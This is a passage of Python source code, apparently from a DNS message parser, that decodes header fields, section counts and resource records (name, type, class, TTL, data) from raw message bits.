message_id: int = extract_int_from_raw_bits(raw_bits=self._message_in_bits, bit_offset=0, number_of_bits=16) qr: int = extract_int_from_raw_bits(raw_bits=self._message_in_bits, byte_offset=2, bit_offset=0, number_of_bits=1) op_code: OPCODE = OPCODE.from_bits(raw_bits=self._message_in_bits, byte_offset=2, bit_offset=1) aa: int = extract_int_from_raw_bits(raw_bits=self._message_in_bits, byte_offset=2, bit_offset=5, number_of_bits=1) tc: int = extract_int_from_raw_bits(raw_bits=self._message_in_bits, byte_offset=2, bit_offset=6, number_of_bits=1) rd: int = extract_int_from_raw_bits(raw_bits=self._message_in_bits, byte_offset=2, bit_offset=7, number_of_bits=1) ra: int = extract_int_from_raw_bits(raw_bits=self._message_in_bits, byte_offset=2, bit_offset=8, number_of_bits=1) z: int = extract_int_from_raw_bits(raw_bits=self._message_in_bits, byte_offset=2, bit_offset=9, number_of_bits=3) rcode: RCODE = RCODE.from_bits(raw_bits=self._message_in_bits, byte_offset=3, bit_offset=2) self._qd_count = extract_int_from_raw_bits(raw_bits=self._message_in_bits, byte_offset=4, bit_offset=0, number_of_bits=16) self._an_count = extract_int_from_raw_bits(raw_bits=self._message_in_bits, byte_offset=6, bit_offset=0, number_of_bits=16) self._ns_count = extract_int_from_raw_bits(raw_bits=self._message_in_bits, byte_offset=8, bit_offset=0, number_of_bits=16) self._ar_count = extract_int_from_raw_bits(raw_bits=self._message_in_bits, byte_offset=10, bit_offset=0, number_of_bits=16) return DnsMessage(message_id=message_id, qr=qr, op_code=op_code, aa=aa, tc=tc, rd=rd, ra=ra, z=z, rcode=rcode) def _parse_question_section(self) -> None: for _ in range(self._qd_count): self._byte_index, parsed_question = Question.from_bytes(raw_bytes=self._message_in_bytes, raw_bits=self._message_in_bits, byte_offset=self._byte_index) self._parsed_message.questions.append(parsed_question) def _parse_answer_section(self) -> None: for _ in range(self._an_count): parsed_rr = self._parse_resource_record() self._parsed_message.answers_RRs.append(parsed_rr) def _parse_authority_section(self) -> None: for _ in range(self._ns_count): parsed_rr = self._parse_resource_record() self._parsed_message.authority_RRs.append(parsed_rr) def _parse_additional_section(self) -> None: for _ in range(self._ar_count): parsed_rr = self._parse_resource_record() self._parsed_message.additional_RRs.append(parsed_rr) def _parse_resource_record(self) -> ResourceRecord: # parse name of the resource record self._byte_index, rr_name = parse_name(raw_bytes=self._message_in_bytes, raw_bits=self._message_in_bits, byte_index=self._byte_index) self._byte_index, rr_type = RRType.from_bytes(raw_bits=self._message_in_bits, byte_offset=self._byte_index) self._byte_index, rr_class = RRClass.from_bytes(raw_bits=self._message_in_bits, byte_offset=self._byte_index) # parse the time to live of the resource record rr_ttl = extract_int_from_raw_bits(raw_bits=self._message_in_bits, byte_offset=self._byte_index, bit_offset=0, number_of_bits=32) self._byte_index += 4 # parse the data of the resource record rr_data_length = extract_int_from_raw_bits(raw_bits=self._message_in_bits, byte_offset=self._byte_index, bit_offset=0, number_of_bits=16) self._byte_index += 2 record_class = RR_TYPE_TO_CLASS_MAPPING.get(rr_type, None) if record_class is None: raw_data = self._message_in_bytes[self._byte_index: self._byte_index + rr_data_length] record = UnparsedResourceRecord(name=rr_name, rr_class=rr_class, ttl=rr_ttl, rr_type=rr_type, raw_data=raw_data) else: record = record_class.from_bytes(raw_bytes=self._message_in_bytes, raw_bits=self._message_in_bits, byte_offset=self._byte_index, rr_data_length=rr_data_length, name=rr_name, rr_class=rr_class, ttl=rr_ttl) self._byte_index += rr_data_length return record